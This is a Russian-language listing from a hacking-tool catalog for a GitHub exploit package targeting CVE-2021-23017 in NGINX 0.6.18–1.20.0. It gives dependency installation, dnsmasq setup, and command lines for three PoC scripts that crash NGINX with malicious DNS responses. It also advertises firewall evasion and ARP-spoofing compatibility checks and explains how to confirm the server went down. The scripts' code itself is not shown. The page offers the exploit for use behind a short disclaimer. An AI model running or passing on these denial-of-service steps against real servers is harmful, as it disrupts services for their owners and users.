Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
EVIL-CVE-2021-23017-Update-2025 — уязвимость в серверах NGINX (версии 0.6.18–1.20.0). Скрипты предназначены для вызова отказа в обслуживании (DoS) путем отправки вредоносных DNS-ответов с улучшениями для обхода брандмауэров. | Kitploit
Инструменты/GitHubGitHub/6lj/evil-cve-2021-23017-update-2025
Анализ уязвимостейЭксплуатацияВеб-безопасностьТестирование на ПроникновениеАнализ DNS
GitHub6lj/evil-cve-2021-23017-update-2025

EVIL-CVE-2021-23017-Update-2025

уязвимость в серверах NGINX (версии 0.6.18–1.20.0). Скрипты предназначены для вызова отказа в обслуживании (DoS) путем отправки вредоносных DNS-ответов с улучшениями для обхода брандмауэров.

Репозиторий
111 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

уязвимость в серверах NGINX (версии 0.6.18–1.20.0). Скрипты предназначены для вызова отказа в обслуживании (DoS) путём отправки вредоносных DNS-ответов с улучшениями для обхода брандмауэров. Это улучшенная версия оригинального PoC из M507/CVE-2021-23017-PoC.

Предупреждение: Используйте только с явного письменного разрешения владельца системы. Несанкционированное тестирование незаконно.

Требования

  • Среда: Linux (например, Kali Linux, через Termux/виртуальную среду).
  • Зависимости:
    root@kitploit:~
    sudo apt-get update
    sudo apt-get install python3-scapy dnsmasq
    pip3 install scapy requests
    
  • Сеть: Та же подсеть, что и у цели, для ARP-спуфинга, или целевой NGINX должен использовать IP-адрес вашего DNS-сервера.

Установка

  1. Клонируйте репозиторий:
    root@kitploit:~
    git clone https://github.com/6lj/EVIL-CVE-2021-23017-Update-2025.git
    cd EVIL-CVE-2021-23017-Update-2025
    
  2. Настройте dnsmasq:
    root@kitploit:~
    sudo nano /etc/dnsmasq.conf
    
    Добавьте: Запустите:
root@kitploit:~
address=/test.example.com/192.168.1.100
root@kitploit:~
sudo systemctl start dnsmasq

Что он делает

  • Отправляет вредоносные DNS-ответы с длинным доменным именем (AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.test.com) для аварийного завершения сервера NGINX.
  • Инициирует DNS-запросы с помощью curl и dig для эксплуатации уязвимости.
  • Обходит брандмауэры, отправляя прямые DNS-пакеты и используя параллельные процессы.

Отличия от оригинала

По сравнению с M507/CVE-2021-23017-PoC:

  • Улучшенный обход брандмауэра: Использует параллельные процессы в poc1.2.3.py для одновременного сниффинга, отправки DNS и запуска запросов. Три скрипта необходимо запускать вместе.
  • Оптимизированная доставка пакетов: Более высокая частота пакетов и запросов для уклонения от фильтров брандмауэра.
  • Проверка подсети: Проверяет совместимость сети для ARP-спуфинга, повышая надёжность.

Использование

Запустите три скрипта вместе с соответствующими аргументами (замените <target_ip>, <your_dns_server_ip>, <target_url>).

poc.py

root@kitploit:~
python3 poc.py --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
  • Перехватывает и отвечает на DNS-запросы.

poc2.py

root@kitploit:~
python3 poc2.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
  • Добавляет прямую отправку DNS и запуск запросов.

poc3.py (Рекомендуется)

root@kitploit:~
python3 poc3.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --target_url http://<target_url>
  • Запускает задачи параллельно для максимальной эффективности.

Пример

root@kitploit:~
python3 poc3.py --target 192.168.1.100 --dns_server 192.168.1.101 --iface eth0 --target_url http://192.168.1.100

Проверка результатов

  • Проверьте статус сервера:

    root@kitploit:~
    curl -I http://<target_url>
    
    • Успех: 502 Bad Gateway или 503 Service Unavailable указывает на аварийное завершение сервера.
    • Неудача: 200 OK говорит об отсутствии уязвимости или блокировке брандмауэром.
  • Отслеживайте DNS-трафик:

    root@kitploit:~
    sudo wireshark -f "udp port 53"
    

Отказ от ответственности: Только для образовательных целей. Авторы не несут ответственности за неправомерное использование.

Скачать инструмент